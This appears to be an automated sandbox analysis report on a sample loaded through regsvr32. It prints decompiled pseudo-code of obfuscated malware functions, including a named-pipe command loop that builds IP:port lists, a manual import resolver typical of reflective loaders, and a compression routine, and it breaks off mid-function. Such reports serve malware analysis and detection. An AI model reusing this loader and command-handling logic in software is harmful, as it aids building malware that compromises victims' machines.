            								 *((intOrPtr*)(_t373 + 0x48)) = (_t238 & _t318) + 0x252e;
            								 *(_t373 + 0x44) = _t365 ^ _t318 | 0x00002ac3;
            								 *(_t373 + 0x4c) =  *(_t373 + 0x18) |  *(_t373 + 0x10) | 0x00002749;
            								do {
            									_t244 =  *((intOrPtr*)(_t373 + 0x68));
            									 *(_t373 + 0x2c) = _t341 &  *(_t373 + 0x28);
            									_push( *(_t244 + 0xe4) *  *(_t244 + 0xe4) - 0x1e7b);
            									_push( *(_t244 + 0x124) ^  *(_t244 + 8) | 0x00001eee);
            									_push(( *(_t244 + 0x1a8) |  *(_t244 + 8)) +  *((intOrPtr*)(_t373 + 0x5c)));
            									_push( *(_t373 + 0x64) * 0x1df3 -  *(_t373 + 0x1c));
            									_push( *(_t373 + 0x78));
            									_push(_t358[0x22] - 0x000021e9 ^ 0x00002c90);
            									_push( *(_t373 + 0x3c));
            									_push(_t358[0x46] * 0x2b78);
            									_t251 = E6D5143A4(_t358[0x75] + _t318 & 0x00001eee,  *((intOrPtr*)(_t373 + 0x40)),  *(_t373 + 0x38), _t358[0x3a] & _t358[0x1a] & 0x00001df3);
            									_t358 =  *(_t373 + 0x98);
            									_t305 =  *(_t373 + 0xa8);
            									_t322 = _t358[2];
            									_push(_t322 |  *(_t373 + 0xac));
            									_push( *(_t373 + 0x64));
            									_push(_t358[0x3e] + _t305);
            									_push( *((intOrPtr*)(_t373 + 0x70)));
            									_push(_t358[0x4f] *  *(_t373 + 0xac) ^ _t358[0x17]);
            									_push( *(_t373 + 0x7c));
            									_push(_t305 - _t358[0x34]);
            									_push( *((intOrPtr*)(_t373 + 0x88)));
            									_push(_t358[0x24] & _t358[0x49]);
            									_push( *((intOrPtr*)(_t373 + 0x6c)) - _t358[0x75]);
            									_push( *(_t373 + 0x98));
            									_push(_t358[0x1d] - _t305 | _t358[0xa]);
            									_push(_t358);
            									_push( *(_t373 + 0xa8));
            									_push(_t322 -  *((intOrPtr*)(_t373 + 0x94)));
            									_push( *(_t373 + 0xac) - _t251 - 0x21e9);
            									E6D51A07D();
            									_t373 = _t373 + 0x70;
            									_push( *((intOrPtr*)(_t373 + 0x48)));
            									LeaveCriticalSection( *(_t373 + 0x50));
            									_t341 =  *_t358;
            									_t358[0xf] = _t358[0xf] | (_t341 ^ 0x00001df3) +  *(_t373 + 0x18);
            									if( *(_t373 + 0x10) <= ((_t358[0x4f] ^ _t305) & _t358[4])) {
            										 *(_t373 + 0x60) =  *(_t373 + 0x60) | _t358[0x1d] |  *(_t373 + 0x1c);
            									}
            									_t318 =  *(_t373 + 0x20);
            									_t276 =  *(_t373 + 0x64) + 2;
            									 *(_t373 + 0x64) = _t276;
            								} while (_t276 >  *(_t373 + 0x50));
            							}
            						} else {
            							_t358[0x23] = _t358[0x7c];
            							_t358[0x2f] = _t358[0x2f] - (_t358[0x4c] ^ 0x000024ad);
            							_t280 = _t358[2];
            							_t350 =  *((intOrPtr*)(_t280 + 0x4c)) - 0x424;
            							while(_t350 <  *((intOrPtr*)(_t280 + 0x1c)) - 0x424) {
            								_t350 = _t350 + 1;
            								 *((intOrPtr*)(_t358[0x14] + 0xbc)) = _t358[0x24] - 0x252e;
            								_t280 = _t358[2];
            							}
            							_t351 =  *(_t373 + 0x28);
            							_t284 = 0xffffff98;
            							 *((intOrPtr*)(_t358[0x1d] + 0x28)) =  *((intOrPtr*)(_t358[0x1d] + 0x28)) + _t284 - _t358;
            							_t329 =  *(_t373 + 0x64);
            							_push(_t355);
            							_push(_t351 - 0x4b6);
            							_push( *(_t373 + 0x1c) + 0xfffffc5b);
            							_t86 = _t365 + 0x37a; // 0x37a
            							_push(_t329);
            							_push(_t329 - 0x9f7);
            							_push(_t329);
            							_t89 = _t365 + 0x129; // 0x129
            							_t331 =  *(_t373 + 0x78) + 0xfffffe4e;
            							_push( &(( *(_t373 + 0x98))[0xa74]));
            							_push(_t351 - 0x52c);
            							_push(_t331);
            							_push( *((intOrPtr*)(_t373 + 0xa4)) + 0x36a);
            							_push(_t331);
            							_push(_t358);
            							_push( *((intOrPtr*)(_t373 + 0x90)) + 0xfffffb5d);
            							E6D5029E2();
            							_t373 = _t373 + 0x3c;
            						}
            					}
            				}
            				return  *((intOrPtr*)(_t373 + 0x54));
            			}








































            APIs
            • SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
            • Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
            • LeaveCriticalSection.KERNEL32(?,?), ref: 6D507B4E
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: CriticalCw242LeaveMqae01idSection
            • String ID: V
            • API String ID: 1039995855-3571732617
            • Opcode ID: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
            • Instruction ID: 4500fdd40326e61316916a76484da3a45bc343e0338b3917c43096f6e4ba33a9
            • Opcode Fuzzy Hash: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
            • Instruction Fuzzy Hash: 23E105B26087459FD725CF68C884E9BB7E9FB88304F048A6EE59AC7250D734E944CF52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 62%
            			E027A371E(void* __fp0) {
            				signed int _v144;
            				signed int _v152;
            				char _v160;
            				char _v164;
            				char _v168;
            				signed int _v172;
            				char _v176;
            				intOrPtr _v180;
            				signed int _v184;
            				signed int _v188;
            				signed int _v192;
            				signed int _v196;
            				char _v200;
            				signed int _v204;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				signed int _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t87;
            				signed int _t88;
            				signed int _t100;
            				void* _t102;
            				void* _t103;
            				unsigned int* _t104;
            				signed int _t110;
            				signed int _t113;
            				void* _t118;
            				intOrPtr _t124;
            				signed int _t127;
            				intOrPtr _t129;
            				intOrPtr _t132;
            				void* _t133;
            				void* _t136;
            				signed int _t145;
            				signed int _t147;
            				signed short* _t148;
            				signed int _t158;
            				intOrPtr* _t182;
            				void* _t186;
            				void* _t187;
            				void* _t188;
            				signed short* _t191;
            				void* _t195;
            				signed int _t198;
            				signed int _t199;
            				signed int _t203;
            				signed int _t204;
            				char _t205;
            				signed int _t207;
            				void* _t209;
            				void* _t215;
            				void* _t222;
            
            				_t222 = __fp0;
            				_t209 = (_t207 & 0xfffffff8) - 0xac;
            				_v144 = 0;
            				_v172 = 0;
            				while(1) {
            					_t72 =  *0x27bf8e0; // 0x47ff8c0
            					_push(0);
            					_push( *0x27bf8c4);
            					_v152 = 0;
            					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
            						break;
            					}
            					_push(0);
            					_push( &_v160);
            					_t75 =  *0x27bf8e0; // 0x47ff8c0
            					_push(0x80000);
            					_push( *0x27bf984);
            					_push( *0x27bf8c4);
            					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
            						GetLastError();
            						goto L56;
            					} else {
            						_t148 =  *0x27bf984; // 0x0
            						_t80 =  *_t148 & 0x0000ffff;
            						_t215 = _t80 - 8;
            						if(_t215 > 0) {
            							_t81 = _t80 - 9;
            							__eflags = _t81;
            							if(_t81 == 0) {
            								E027B09E0( &_v200);
            								L12:
            								_t84 =  &_v200;
            								L13:
            								_push(4);
            								L14:
            								_push(_t84);
            								_push(5);
            								L31:
            								_pop(_t186);
            								E027AD2AB(_t186);
            								L32:
            								L56:
            								DisconnectNamedPipe( *0x27bf8c4);
            								_push(0);
            								_pop(0);
            								_push(1);
            								_pop(1);
            								if(_v172 == 0) {
            									continue;
            								}
            								break;
            							}
            							_t87 = _t81;
            							__eflags = _t87;
            							if(_t87 == 0) {
            								_v204 = 0;
            								_t88 = E027A16B0( &_v204, _t222);
            								_v188 = _t88;
            								__eflags = _t88;
            								if(_t88 == 0) {
            									_push(4);
            									_v192 = 0;
            									_push( &_v192);
            									L19:
            									_push(0xa);
            									goto L31;
            								}
            								_t145 = _v204;
            								_t90 = _t145 * 0x16;
            								_v184 = _t145 * 0x16;
            								_t203 = E027A8D70(_t90);
            								_v192 = _t203;
            								__eflags = _t203;
            								if(_t203 == 0) {
            									_t64 =  &_v192;
            									 *_t64 = _v192 & 0x00000000;
            									__eflags =  *_t64;
            									_push(4);
            									_push( &_v192);
            									_t187 = 0xa;
            									E027AD2AB(_t187);
            									L52:
            									E027A8D86( &_v188, _t145);
            									goto L32;
            								}
            								_t198 = 0;
            								__eflags = _t145;
            								if(_t145 == 0) {
            									L50:
            									_push(E027AA5DA(_t203));
            									_push(_t203);
            									_t188 = 5;
            									E027AD2AB(_t188);
            									E027A8D86( &_v192, 0xffffffff);
            									_t209 = _t209 + 0x10;
            									goto L52;
            								}
            								_t158 = _v188 + 4;
            								__eflags = _t158;
            								_v204 = _t158;
            								do {
            									__eflags = _t198;
            									if(_t198 != 0) {
            										__eflags = _t198 - _t145 - 1;
            										if(_t198 < _t145 - 1) {
            											_t102 = E027AA5DA(_t203);
            											_t158 = _v204;
            											 *((short*)(_t102 + _t203)) = 0x3b;
            										}
            									}
            									_t100 =  *_t158;
            									_v196 = _t100;
            									__eflags = _t100;
            									if(_t100 != 0) {
            										_t103 = E027AA5DA(_t203);
            										_t104 = _v204;
            										_push(_t104[1] & 0x0000ffff);
            										_push( *_t104 >> 0x18);
            										_push(_t104[0] & 0x000000ff);
            										_push(_t104[0] & 0x000000ff);
            										_t110 = E027AA5DA(_t203) + _t203;
            										__eflags = _t110;
            										E027A9FAF(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
            										_t158 = _v204;
            										_t209 = _t209 + 0x20;
            									}
            									_t198 = _t198 + 1;
            									_t158 = _t158 + 0x20;
            									_v204 = _t158;
            									__eflags = _t198 - _t145;
            								} while (_t198 < _t145);
            								goto L50;
            							}
            							__eflags = _t87 != 1;
            							if(_t87 != 1) {
            								goto L56;
            							}
            							_v204 = 0;
            							_t113 = E027A16B0( &_v204, _t222);
            							_t204 = _v204;
            							_v196 = _t113;
            							__eflags = _t113;
            							if(_t113 != 0) {
            								E027A8D86( &_v196, _t204);
            							}
            							_v204 = _t204 * 0x16;
            							_t84 =  &_v204;
            							goto L13;
            						}
            						if(_t215 == 0) {
            							_t84 = E027B09E0( &_v200);
            							L16:
            							__eflags = _t84;
            							if(_t84 == 0) {
            								_push(0);
            								_push(0);
            								goto L19;
            							}
            							_push(_v200);
            							goto L14;
            						}
            						_t118 = _t80 - 1;
            						if(_t118 == 0) {
            							_t199 = E027A9CD0( &(_t148[4]), 0x20, 1,  &_v176);
            							_v196 = _t199;
            							__eflags = _t199;
            							if(_t199 == 0) {
            								L30:
            								_t191 =  *0x27bf984; // 0x0
            								E027AA078( &_v164,  &(_t191[4]), 0x80);
            								_push(0x84);
            								_push( &_v168);
            								_push(2);
            								goto L31;
            							}
            							_t205 = _v176;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								_t124 = E027A1D6E(E027AA10C( *_t199, __eflags), 0, 0, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t124;
            								goto L30;
            							}
            							_t125 = _t205 - 1;
            							_v184 = _t205 - 1;
            							_t127 = E027A8D70(_t125 << 2);
            							_v188 = _t127;
            							__eflags = _t127;
            							if(_t127 == 0) {
            								goto L30;
            							}
            							_t147 = 1;
            							__eflags = _t205 - 1;
            							if(__eflags <= 0) {
            								L28:
            								_t129 = E027A1D6E(E027AA10C( *_t199, __eflags), _t127, _v184, 0);
            								_t209 = _t209 + 0x10;
            								_v168 = _t129;
            								E027A9DC9( &_v176);
            								goto L30;
            							}
            							_v204 = _t127;
            							do {
            								_t132 = E027A9A1D( *((intOrPtr*)(_t199 + _t147 * 4)), E027AA5DA( *((intOrPtr*)(_t199 + _t147 * 4))));
            								_t182 = _v204;
            								_t147 = _t147 + 1;
            								 *_t182 = _t132;
            								_v204 = _t182 + 4;
            								__eflags = _t147 - _t205;
            							} while (__eflags < 0);
            							_t127 = _v188;
            							goto L28;
            						}
            						_t133 = _t118 - 3;
            						if(_t133 == 0) {
            							_push(0);
            							_push(0);
            							_t195 = 5;
            							E027AD2AB(_t195);
            							 *0x27bf9b8 = 1;
            							_v172 = 1;
            							goto L56;
            						}
            						_t136 = _t133;
            						if(_t136 == 0) {
            							_t84 = E027B09BE( &_v200);
            							goto L16;
            						}
            						if(_t136 != 1) {
            							goto L56;
            						}
            						E027B09BE( &_v200);
            						goto L12;
            					}
            				}
            				return 0;
            			}

            APIs
            • GetLastError.KERNEL32 ref: 027A3754
              • Part of subcall function 027AD2AB: FlushFileBuffers.KERNEL32(00000000,?,027A3A64,00000000,00000004), ref: 027AD2F1
            • DisconnectNamedPipe.KERNEL32 ref: 027A3AA1
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: 3c1f8601bc31e019b1bc1cd57e3db227f67f15d0399fd92776892c305789d2e5
            • Instruction ID: 39a3b88aaba031f23b4954000d955a4fb028bf92a747afd754a3428599415970
            • Opcode Fuzzy Hash: 3c1f8601bc31e019b1bc1cd57e3db227f67f15d0399fd92776892c305789d2e5
            • Instruction Fuzzy Hash: CCA1BEB2508302AFD315DF28D8A9A6BB7E9EFC8734F008A5EF55596180DB34D904CF62
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E027B3789(signed int __eax, void* __ecx, intOrPtr _a4) {
            				intOrPtr* _v8;
            				signed int* _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				struct HINSTANCE__* _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				struct HINSTANCE__* _v48;
            				intOrPtr _v52;
            				signed int _v56;
            				intOrPtr _v60;
            				signed int _v64;
            				signed int _t109;
            				signed int _t112;
            				signed int _t115;
            				void* _t163;
            				void* _t167;
            
            				_t167 = __ecx;
            				_v44 = _v44 & 0x00000000;
            				if(_a4 != 0) {
            					_v48 = GetModuleHandleA("kernel32.dll");
            					_v40 = E027AF0A4(_t167, _v48, "GetProcAddress");
            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            					_v32 = _v52;
            					_t109 = 8;
            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
            						L24:
            						return 0;
            					}
            					_v56 = 0x80000000;
            					_t112 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_v8 = _v8 + 0x14;
            					}
            					_t115 = 8;
            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
            						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
            						if(_v36 != 0) {
            							if( *_v8 == 0) {
            								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
            							} else {
            								_v12 =  *_v8 + _a4;
            							}
            							_v28 = _v28 & 0x00000000;
            							while( *_v12 != 0) {
            								_v24 = _v24 & 0x00000000;
            								_v16 = _v16 & 0x00000000;
            								_v64 = _v64 & 0x00000000;
            								_v20 = _v20 & 0x00000000;
            								if(( *_v12 & _v56) == 0) {
            									_v60 =  *_v12 + _a4;
            									_v20 = _v60 + 2;
            									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
            									_v16 = _v40(_v36, _v20);
            								} else {
            									_v24 =  *_v12;
            									_v20 = _v24 & 0x0000ffff;
            									_v16 = _v40(_v36, _v20);
            								}
            								if(_v24 != _v16) {
            									_v44 = _v44 + 1;
            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
            										 *_v12 = _v16;
            									} else {
            										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
            									}
            								}
            								_v12 =  &(_v12[1]);
            								_v28 = _v28 + 4;
            							}
            							_v8 = _v8 + 0x14;
            							continue;
            						}
            						_t163 = 0xfffffffd;
            						return _t163;
            					}
            					goto L24;
            				}
            				return __eax | 0xffffffff;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 027B37A6
            • LoadLibraryA.KERNEL32(00000000), ref: 027B383F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: bf4c712631a0f2e348e31a80c934b087bafa1b2c910ee7c6d4aa6f8a2e88dbb1
            • Instruction ID: 66fe3e767349096d7bf8fa6618c904a47d89455e3013dc0a4960b7bf99c6f0f8
            • Opcode Fuzzy Hash: bf4c712631a0f2e348e31a80c934b087bafa1b2c910ee7c6d4aa6f8a2e88dbb1
            • Instruction Fuzzy Hash: DB616E75D00209EFDB11CF98C585BEDBBB1FF08329F248599E915AB291C774AA80CF54
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E027B4180(int _a4, signed int _a8) {
            				int _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void* __esi;
            				void* _t137;
            				signed int _t141;
            				intOrPtr* _t142;
            				signed int _t145;
            				signed int _t146;
            				intOrPtr _t151;
            				intOrPtr _t161;
            				intOrPtr _t162;
            				intOrPtr _t167;
            				intOrPtr _t170;
            				signed int _t172;
            				intOrPtr _t173;
            				int _t184;
            				intOrPtr _t185;
            				intOrPtr _t188;
            				signed int _t189;
            				void* _t195;
            				int _t202;
            				int _t208;
            				intOrPtr _t217;
            				signed int _t218;
            				int _t219;
            				intOrPtr _t220;
            				signed int _t221;
            				signed int _t222;
            				int _t224;
            				int _t225;
            				signed int _t227;
            				intOrPtr _t228;
            				int _t232;
            				int _t234;
            				signed int _t235;
            				int _t239;
            				void* _t240;
            				int _t245;
            				int _t252;
            				signed int _t253;
            				int _t254;
            				void* _t257;
            				void* _t258;
            				int _t259;
            				intOrPtr _t260;
            				int _t261;
            				signed int _t269;
            				signed int _t271;
            				intOrPtr* _t272;
            				void* _t273;
            
            				_t253 = _a8;
            				_t272 = _a4;
            				_t3 = _t272 + 0xc; // 0x452bf84d
            				_t4 = _t272 + 0x2c; // 0x8df075ff
            				_t228 =  *_t4;
            				_t137 =  *_t3 + 0xfffffffb;
            				_t229 =  <=  ? _t137 : _t228;
            				_v16 =  <=  ? _t137 : _t228;
            				_t269 = 0;
            				_a4 =  *((intOrPtr*)( *_t272 + 4));
            				asm("o16 nop [eax+eax]");
            				while(1) {
            					_t8 = _t272 + 0x16bc; // 0x5deed9c3
            					_t141 =  *_t8 + 0x2a >> 3;
            					_v12 = 0xffff;
            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
            					if(_t217 < _t141) {
            						break;
            					}
            					_t11 = _t272 + 0x6c; // 0xf8e4158b
            					_t12 = _t272 + 0x5c; // 0x35e85000
            					_t245 =  *_t11 -  *_t12;
            					_v8 = _t245;
            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
            					_t247 =  <  ? _t195 : _v12;
            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
            					if(_t227 >= _v16) {
            						L7:
            						if(_t253 != 4) {
            							L10:
            							_t269 = 0;
            							__eflags = 0;
            						} else {
            							_t285 = _t227 - _t195;
            							if(_t227 != _t195) {
            								goto L10;
            							} else {
            								_t269 = _t253 - 3;
            							}
            						}
            						E027B71A0(_t272, _t272, 0, 0, _t269);
            						_t18 = _t272 + 0x14; // 0xc703f045
            						_t19 = _t272 + 8; // 0x8d000040
            						 *( *_t18 +  *_t19 - 4) = _t227;
            						_t22 = _t272 + 0x14; // 0xc703f045
            						_t23 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
            						_t26 = _t272 + 0x14; // 0xc703f045
            						_t27 = _t272 + 8; // 0x8d000040
            						 *( *_t26 +  *_t27 - 2) =  !_t227;
            						_t30 = _t272 + 0x14; // 0xc703f045
            						_t31 = _t272 + 8; // 0x8d000040
            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
            						E027B5F00(_t285,  *_t272);
            						_t202 = _v8;
            						_t273 = _t273 + 0x14;
            						if(_t202 != 0) {
            							_t208 =  >  ? _t227 : _t202;
            							_v8 = _t208;
            							_t36 = _t272 + 0x38; // 0xf47d8bff
            							_t37 = _t272 + 0x5c; // 0x35e85000
            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
            							_t273 = _t273 + 0xc;
            							_t252 = _v8;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
            							_t227 = _t227 - _t252;
            						}
            						if(_t227 != 0) {
            							E027B6040( *_t272,  *( *_t272 + 0xc), _t227);
            							_t273 = _t273 + 0xc;
            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
            						}
            						_t253 = _a8;
            						if(_t269 == 0) {
            							continue;
            						}
            					} else {
            						if(_t227 != 0 || _t253 == 4) {
            							if(_t253 != 0 && _t227 == _t195) {
            								goto L7;
            							}
            						}
            					}
            					break;
            				}
            				_t142 =  *_t272;
            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
            				_a4 = _t232;
            				if(_t232 == 0) {
            					_t83 = _t272 + 0x6c; // 0xf8e4158b
            					_t254 =  *_t83;
            				} else {
            					_t59 = _t272 + 0x2c; // 0x8df075ff
            					_t224 =  *_t59;
            					if(_t232 < _t224) {
            						_t65 = _t272 + 0x3c; // 0x830cc483
            						_t66 = _t272 + 0x6c; // 0xf8e4158b
            						_t260 =  *_t66;
            						__eflags =  *_t65 - _t260 - _t232;
            						if( *_t65 - _t260 <= _t232) {
            							_t67 = _t272 + 0x38; // 0xf47d8bff
            							_t261 = _t260 - _t224;
            							 *(_t272 + 0x6c) = _t261;
            							memcpy( *_t67,  *_t67 + _t224, _t261);
            							_t70 = _t272 + 0x16b0; // 0x830a74c0
            							_t188 =  *_t70;
            							_t273 = _t273 + 0xc;
            							_t232 = _a4;
            							__eflags = _t188 - 2;
            							if(_t188 < 2) {
            								_t189 = _t188 + 1;
            								__eflags = _t189;
            								 *(_t272 + 0x16b0) = _t189;
            							}
            						}
            						_t73 = _t272 + 0x38; // 0xf47d8bff
            						_t74 = _t272 + 0x6c; // 0xf8e4158b
            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
            						_t225 = _a4;
            						_t273 = _t273 + 0xc;
            						_t76 = _t272 + 0x6c;
            						 *_t76 =  *(_t272 + 0x6c) + _t225;
            						__eflags =  *_t76;
            						_t78 = _t272 + 0x6c; // 0xf8e4158b
            						_t184 =  *_t78;
            						_t79 = _t272 + 0x2c; // 0x8df075ff
            						_t239 =  *_t79;
            					} else {
            						 *(_t272 + 0x16b0) = 2;
            						_t61 = _t272 + 0x38; // 0xf47d8bff
            						memcpy( *_t61,  *_t142 - _t224, _t224);
            						_t62 = _t272 + 0x2c; // 0x8df075ff
            						_t184 =  *_t62;
            						_t273 = _t273 + 0xc;
            						_t225 = _a4;
            						_t239 = _t184;
            						 *(_t272 + 0x6c) = _t184;
            					}
            					_t254 = _t184;
            					 *(_t272 + 0x5c) = _t184;
            					_t81 = _t272 + 0x16b4; // 0x5750438
            					_t185 =  *_t81;
            					_t240 = _t239 - _t185;
            					_t241 =  <=  ? _t225 : _t240;
            					_t242 = ( <=  ? _t225 : _t240) + _t185;
            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
            				}
            				if( *(_t272 + 0x16c0) < _t254) {
            					 *(_t272 + 0x16c0) = _t254;
            				}
            				if(_t269 == 0) {
            					_t218 = _a8;
            					__eflags = _t218;
            					if(_t218 == 0) {
            						L34:
            						_t89 = _t272 + 0x3c; // 0x830cc483
            						_t219 =  *_t272;
            						_t145 =  *_t89 - _t254 - 1;
            						_a4 =  *_t272;
            						_t234 = _t254;
            						_v16 = _t145;
            						_v8 = _t254;
            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
            							_v8 = _t254;
            							_t95 = _t272 + 0x5c; // 0x35e85000
            							_a4 = _t219;
            							_t234 = _t254;
            							_t97 = _t272 + 0x2c; // 0x8df075ff
            							__eflags =  *_t95 -  *_t97;
            							if( *_t95 >=  *_t97) {
            								_t98 = _t272 + 0x2c; // 0x8df075ff
            								_t167 =  *_t98;
            								_t259 = _t254 - _t167;
            								_t99 = _t272 + 0x38; // 0xf47d8bff
            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
            								 *(_t272 + 0x6c) = _t259;
            								memcpy( *_t99, _t167 +  *_t99, _t259);
            								_t103 = _t272 + 0x16b0; // 0x830a74c0
            								_t170 =  *_t103;
            								_t273 = _t273 + 0xc;
            								__eflags = _t170 - 2;
            								if(_t170 < 2) {
            									_t172 = _t170 + 1;
            									__eflags = _t172;
            									 *(_t272 + 0x16b0) = _t172;
            								}
            								_t106 = _t272 + 0x2c; // 0x8df075ff
            								_t145 = _v16 +  *_t106;
            								__eflags = _t145;
            								_a4 =  *_t272;
            								_t108 = _t272 + 0x6c; // 0xf8e4158b
            								_t234 =  *_t108;
            								_v8 = _t234;
            							}
            						}
            						_t255 = _a4;
            						_t220 =  *((intOrPtr*)(_a4 + 4));
            						__eflags = _t145 - _t220;
            						_t221 =  <=  ? _t145 : _t220;
            						_t146 = _t221;
            						_a4 = _t221;
            						_t222 = _a8;
            						__eflags = _t146;
            						if(_t146 != 0) {
            							_t114 = _t272 + 0x38; // 0xf47d8bff
            							E027B6040(_t255,  *_t114 + _v8, _t146);
            							_t273 = _t273 + 0xc;
            							_t117 = _t272 + 0x6c;
            							 *_t117 =  *(_t272 + 0x6c) + _a4;
            							__eflags =  *_t117;
            							_t119 = _t272 + 0x6c; // 0xf8e4158b
            							_t234 =  *_t119;
            						}
            						__eflags =  *(_t272 + 0x16c0) - _t234;
            						if( *(_t272 + 0x16c0) < _t234) {
            							 *(_t272 + 0x16c0) = _t234;
            						}
            						_t122 = _t272 + 0x16bc; // 0x5deed9c3
            						_t123 = _t272 + 0xc; // 0x452bf84d
            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
            						__eflags = _t257 - 0xffff;
            						_t258 =  >  ? 0xffff : _t257;
            						_t124 = _t272 + 0x2c; // 0x8df075ff
            						_t151 =  *_t124;
            						_t125 = _t272 + 0x5c; // 0x35e85000
            						_t235 = _t234 -  *_t125;
            						__eflags = _t258 - _t151;
            						_t152 =  <=  ? _t258 : _t151;
            						__eflags = _t235 - ( <=  ? _t258 : _t151);
            						if(_t235 >= ( <=  ? _t258 : _t151)) {
            							L49:
            							__eflags = _t235 - _t258;
            							_t154 =  >  ? _t258 : _t235;
            							_a4 =  >  ? _t258 : _t235;
            							__eflags = _t222 - 4;
            							if(_t222 != 4) {
            								L53:
            								_t269 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t272;
            								__eflags =  *(_t161 + 4);
            								_t154 = _a4;
            								if( *(_t161 + 4) != 0) {
            									goto L53;
            								} else {
            									__eflags = _t154 - _t235;
            									if(_t154 != _t235) {
            										goto L53;
            									} else {
            										_t269 = _t222 - 3;
            									}
            								}
            							}
            							_t131 = _t272 + 0x38; // 0xf47d8bff
            							_t132 = _t272 + 0x5c; // 0x35e85000
            							E027B71A0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
            							_t134 = _t272 + 0x5c;
            							 *_t134 =  *(_t272 + 0x5c) + _a4;
            							__eflags =  *_t134;
            							E027B5F00( *_t134,  *_t272);
            						} else {
            							__eflags = _t235;
            							if(_t235 != 0) {
            								L46:
            								__eflags = _t222;
            								if(_t222 != 0) {
